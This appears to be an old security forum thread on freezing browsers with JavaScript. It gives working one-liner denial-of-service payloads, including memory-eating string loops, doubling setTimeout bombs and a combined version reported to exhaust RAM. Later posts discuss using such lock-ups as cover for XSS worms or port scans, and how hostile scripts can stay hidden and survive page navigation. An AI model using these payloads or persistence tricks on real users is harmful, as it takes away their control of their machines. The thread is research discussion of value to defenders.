I was going through the blog archives on ha.ckers, and bumped into this http://ha.ckers.org/blog/20060830/internet-explorer-dos/ about an IE DoS.

If the goal is simply to disable the browser, it's remarkably easy to do.
- Every browser runs javascript in a single thread. Netscape did some work that would have allowed multithreading at some point, but even then a single html document could only use one thread.
- There are enough UI events that javascript needs to react to synchronously that you can effectively freeze your browser UI by making sure javascript keeps busy.

Now, most browsers also have this defense mechanism that pops up a dialog similar to "A script is taking a long time to run. Kill it?", but those are pretty far from perfect.
They are good enough to catch something as obvious as:
javascript:while(1);

Let's take a quick look at 2 resource eaters here.
We're limiting ourselves to core ecmascript features, as those are (somewhat) guaranteed to work consistently across browsers.

1: String manipulation.
In javascript, every string operation creates a new string. Not terribly efficient, but usually good enough.
javascript:a='a';while(a+=a);
Same basic loop, but creating a new, ever-growing string on each iteration.
On firefox, this stops fairly quickly with an "Out of memory" error, after eating 100MB or so of RAM.
IE keeps going a while longer (longer than my patience anyway), and uses about as much RAM.
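A quick back-of-the-envelope check shows why this dies so fast (a sketch; the 2-bytes-per-character UTF-16 storage is an assumption about how the engine stores the string):

```javascript
// The a+=a loop doubles the string every iteration, so its length
// after n iterations is 2^n characters. Count how many doublings
// it takes to cross a memory target.
function iterationsToReach(targetBytes, bytesPerChar) {
  let length = 1; // starting from the single character 'a'
  let n = 0;
  while (length * bytesPerChar < targetBytes) {
    length *= 2; // a += a doubles the string
    n++;
  }
  return n;
}

console.log(iterationsToReach(100 * 1024 * 1024, 2)); // 26
```

So the ~100MB ceiling is hit after only about 26 iterations; the loop spends almost all its time copying one giant string.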

javascript:(function t(s){return t(s+s)})('a')
Same concept, but using recursion instead of a loop.
on firefox, same "out of memory" error, same 100MB limit.
on IE, this uses twice as much memory as the earlier version (each recursive frame keeps its own copy of the string alive), but triggers an "out of stack space" error fairly quickly.
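That stack limit is easy to probe directly; a minimal sketch (modern engines raise the stack exhaustion error as a catchable exception, so a try/catch can report the depth reached):

```javascript
// Recurse until the engine throws its "out of stack space" /
// "maximum call stack size exceeded" error, and report how deep
// we got. The error is catchable, so the script survives it.
function maxDepth(n) {
  try {
    return maxDepth(n + 1);
  } catch (e) {
    return n; // stack exhausted at this depth
  }
}

console.log(maxDepth(0) > 1000); // engines allow thousands of frames
```

The exact depth varies by engine and stack size, but it's small enough that the recursive version hits the stack wall long before the loop version hits the memory wall.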

2: Asynchronous callbacks.
This is a lot better at freezing browsers. The idea is to schedule callbacks at a fast rate and watch the browser struggle to handle them, leaving everything else (like handling UI events) behind.
javascript:(function t(){setTimeout(t,0);setTimeout(t,0)})()
Here, every time t() gets called, 2 asynchronous callbacks to t() are scheduled to run as soon as possible.
on both IE and firefox, this kept the browser frozen longer than I felt like waiting.
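The growth here is easy to see on paper. A sketch of the arithmetic (simulated with a plain counter, not the literal event loop): every callback that runs schedules two replacements, so the pending-callback count doubles each generation.

```javascript
// Simulate the doubling timer bomb: one initial call to t(), and
// each callback that fires schedules two more, so the number of
// pending callbacks doubles per "generation" of the event loop.
function pendingPerGeneration(generations) {
  let pending = 1; // the initial call to t()
  const history = [pending];
  for (let g = 0; g < generations; g++) {
    pending *= 2; // each callback re-schedules itself twice
    history.push(pending);
  }
  return history;
}

console.log(pendingPerGeneration(5)); // [ 1, 2, 4, 8, 16, 32 ]
```

After a few dozen generations the timer queue alone is enough work to starve everything else.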

Of course, why schedule only 2 callbacks at a time:
javascript:(function t(){while(setTimeout(t,0));})()
Same visible results on both browsers, although this is likely to be a bit more painful to handle.
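Worth noting why the while(setTimeout(t,0)) form loops at all: setTimeout returns a timer handle, which is truthy, so the condition only fails once scheduling itself breaks down. A quick check:

```javascript
// setTimeout returns a timer handle (a positive integer in
// browsers, a Timeout object in node); either way it's truthy,
// which is what keeps while(setTimeout(t,0)); spinning.
const handle = setTimeout(function () {}, 0);
console.log(Boolean(handle)); // true
clearTimeout(handle); // clean up so nothing actually fires
```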

To conclude, let's combine both resource eaters for maximum effect:

javascript:(function t(s){while(setTimeout(t,0,s))s+=s;})('a')
On firefox, this keeps the CPU at 100%, eats 1GB of RAM on my box (which happens to have 1GB of physical RAM), then swaps like crazy.
on IE, it ends up triggering a "not enough storage to complete an operation" error after eating a bit of RAM, but keeps the CPU usage at 100%.

There are plenty of variations on those techniques, and that's without looking at anything in the DOM yet.
For example, if your resource-wasting code is wrapped in a try{}catch(e){} block, you may be able to survive some of the errors mentioned above.
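A minimal sketch of that survival trick, using the cheap-to-trigger stack exhaustion error rather than genuine memory exhaustion (whether a given engine surfaces its out-of-memory condition as a catchable error varies, so this is the principle, not a guarantee):

```javascript
// Deliberately blow the stack, swallow the resulting error, and
// show that the surrounding script keeps running afterwards.
function blowTheStack() {
  return blowTheStack(); // no tail-call elimination: stack grows
}

let survived = false;
try {
  blowTheStack();
} catch (e) {
  survived = true; // "out of stack space" caught here
}
console.log(survived); // true
```

The catch block could just as well restart the resource eater, which is what makes the kill-the-script dialogs so imperfect.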

Overall it's safe to say that once you run javascript on someone's browser, you can easily deny them the use of their browser, and quite possibly the use of their computer for a little while.

That could be super useful if you can save some of those resources for other more malicious things. One of the things I've been thinking about (aside from the MITM DoS stuff that I mentioned in the blog) is both the XSS Warhol Worm as well as the JavaScript port scanner - both of which may take up quite a bit of time, and it would be good if you could essentially lock the computer while you were performing your task.

Hahah, well if we can overcome airgap security on this board, I'd be amazed. ;) I'd be happy just stalling them. Another approach I've thought of is playing something like this to keep people occupied: http://www.badgerbadgerbadger.com/

Hell... why not, just ask for everything... cookies, flash, Java, etc... Not a bad idea... I mean 80% of the reason I ever have JavaScript turned on is for testing, and the other 20% is Google's AdSense, which requires it. If it weren't for them I'd probably never have it turned on other than for testing.

> That could be super useful if you can save some of those resources for other more malicious things

I meant to respond to that earlier.
I'd argue that stealth and resiliency are a better strategy for survival than freezing the computer.
Stealth would cover hiding any signs of activity in the UI (the status bar is a big one), while resiliency would cover surviving a page navigation event.

Back in the day, one could write a java applet that would start a thread that survived long after the original applet was unloaded, as long as the browser was still running. Similarly, one could pop up a new window outside of the screen boundaries.
Nowadays, it's probably harder. However, add-ons on top of the regular browser sandbox are good candidates for this kind of oversight (java, greasemonkey & acrobat reader would all be worthy of a closer look for starters).

> - Every browser runs javascript in a single thread. Netscape did some work that'd have allowed multithreading at some point, but even then a single html document could only use one single thread.

They've apparently been busy since I last looked at that stuff..
The recent schmoocon presentation http://news.com.com/1606-2_3-6121987.html?part=rss&tag=6121987&subj=news claims FireFox has *some* threading remnants lying around, and they're right.

Take the following code sample:
javascript:void(setTimeout(function(){setTimeout("alert(1)",0);alert(2)},0))

Try running this in IE, Opera, or any sane javascript interpreter, and you'll see "2" popping up before "1".
On firefox, you get "1" before "2", which should be impossible in a single-threaded interpreter.

I haven't dug deeper yet, but this could be loads of fun (until it gets fixed of course.)

That would make sense since Firefox was built off some of the old Netscape code, right? I don't have my browser history down pat. I know that Netscape currently uses both Gecko and IE, but I'm not sure what the origins of Gecko are - I probably should since I've met a good chunk of the Mozilla guys.

Yes.
Netscape decided to open source their browser codebase back in 98, and created the Mozilla project to handle it.
It took a little while for mozilla to find its footing.
Some chunks of it ended up being pretty much entirely rewritten (like the browser UI code, which moved from 3 codebases, one for mac, one for unix and one for win32, to essentially one new mechanism, XUL), and some chunks were kept exactly as is and improved on as time went by (like the javascript interpreters, spidermonkey and rhino).

In other news, the toorcon thing is kinda busted, according to this http://developer.mozilla.org/devnews/index.php/2006/10/02/update-possible-vulnerability-reported-at-toorcon/
That makes me sad.
When I see someone presenting a demo by cursing a lot, laughing after every sentence and mocking "linux fanboys", I expect solid stuff.

Still, this has potential. For example, this allows you to keep some js code running even after the browser navigated to a new page.
The only downside is, js code that runs in such a context has almost no access to any DOM stuff, so the only way I can even tell it runs is that it generates errors as it bumps into the sandbox.

God it's nice talking to someone who actually understands browsers! Okay, I've got a question I haven't seen answered anywhere. I'm assuming this is some sort of protection built in but I can't figure out where:

If you have an iframe to another domain and that page in the other domain has a link (HREF) to a javascript directive with target="_top" it just disables it.

Ok, so I'm wrong. Nothing remotely close to threading in javascript, even on Firefox.
The only trick happening here is that calls to alert/prompt/confirm are breaking the flow of execution of the current script, but aren't preventing timer-generated scripts from starting.

It's still bad enough to be probably exploitable in some way (working on it), but it's nothing close to what I was hoping for.

It's too bad... I had big plans for that, but you're right, both IE and Firefox have it disabled, so I'm guessing it's something they thought about. However, it occurred to me that I've actually seen situations where JavaScript can create its own pseudo domain, for lack of a better term. When it's constructing HTML in a new window, that new window doesn't appear to be able to access cookies from the parent domain. That's what I figured would happen here, but instead it was completely disabled.

I once DoSsed Firefox (before FF2), and my computer for that matter, using JS. Firefox peaked at 89% CPU usage and hovered there for a while. All 512MB of RAM got eaten and I received a "Your virtual memory is running low" or whatever it says, then the whole thing DoSsed, no cursor movement. CPU was crunchy for a couple of days after...

I still have a copy of the HTML/JS I used, but I did mess it up a bit. Assuming it won't cause any long-term damage I might try and revive it; it would be interesting to know how exactly it worked. I'll post back if I get it fixed.

Edit: I believe it was some form of recursion(?) through accessing the "about" protocol using document.location...

Interesting... I've thought about doing that... if you had access to chrome you could easily DoS it by opening up many instances of Firefox, but I didn't know you could recurse in about. I'll be curious to see how you did it.

about:mozilla - clever people made this. It has references to firebird and thunderbird. It also has references to payware (MAMMON, wiki it). Before sp2 this gave you a blue screen of death page in IE. Does anyone know what 7:15 means to the Mozilla team?